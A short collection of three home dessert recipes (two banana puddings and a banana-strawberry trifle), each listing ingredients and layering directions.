Granny’s Banana Pudding

INGREDIENTS:

1 (8 oz.) pkg. Philadelphia cream cheese, softened
2 1/4 c. milk
1 (3 1/2 oz.) pkg. vanilla instant pudding & pie mix
24 vanilla wafers
2 c. banana slices

DIRECTIONS:

I usually double this recipe. Serves 10.

Combine cream cheese and 1/2 cup milk, mixing at medium speed on electric mixer until well blended. Add remaining milk and pudding mix, beat at low speed 1 minute. Layer 1/3 of pudding mixture, half of wafers, half of bananas in 1 1/2 quart serving bowl. Repeat layers. Top with remaining pudding and garnish with 2 slices of bananas and 2 wafers. Ever So Elegant Banana Trifle

INGREDIENTS:

1 pkg. (3 oz.) strawberry Jello
3/4 c. boiling water
1/2 c. cold water
1 c. sliced bananas
1 c. sliced strawberries
2 c. 1/2 inch pound cake cubes
1/4 c. orange juice
1 pkg. (4 serving size) vanilla instant pudding and pie filling
1/2 c. thawed Cool Whip topping

DIRECTIONS:

Dissolve gelatin in boiling water. Add ice cubes to cold water to make 1 1/4 cups. Add to gelatin. Stir until slightly thickened. Remove unmelted ice. Stir in bananas and strawberries. Place cake cubes in large serving bowl. Sprinkle with orange juice. Spoon gelatin mixture over cake cubes. Chill for 15 minutes.

Prepare pudding mix with 1 1/2 cups milk. Let stand few minutes to thicken. Fold in whipped topping (Cool Whip). Spoon into bowl over gelatin. Chill. Creamy Banana Pudding

INGREDIENTS:

1 (14 oz.) can Eagle Brand sweetened condensed milk (not evaporated milk)
1 1/2 c. cold water
1 (4-serving size) pkg. instant vanilla flavor pudding & pie filling mix
2 c. (1 pt.) whipping cream, whipped
36 vanilla wafers
3 med. bananas, sliced & dipped in lemon juice

DIRECTIONS:

In large bowl, combine sweetened condensed milk and water. Add pudding mix; beat well. Chill 5 minutes. Fold in whipped cream. Spoon 1 cup pudding mixture into 2 1/2 quart glass serving bowl. Top with 1/3 each of wafers, bananas and remaining pudding mixture. Repeat layering twice, ending with pudding mixture. Chill thoroughly. Garnish as desired.
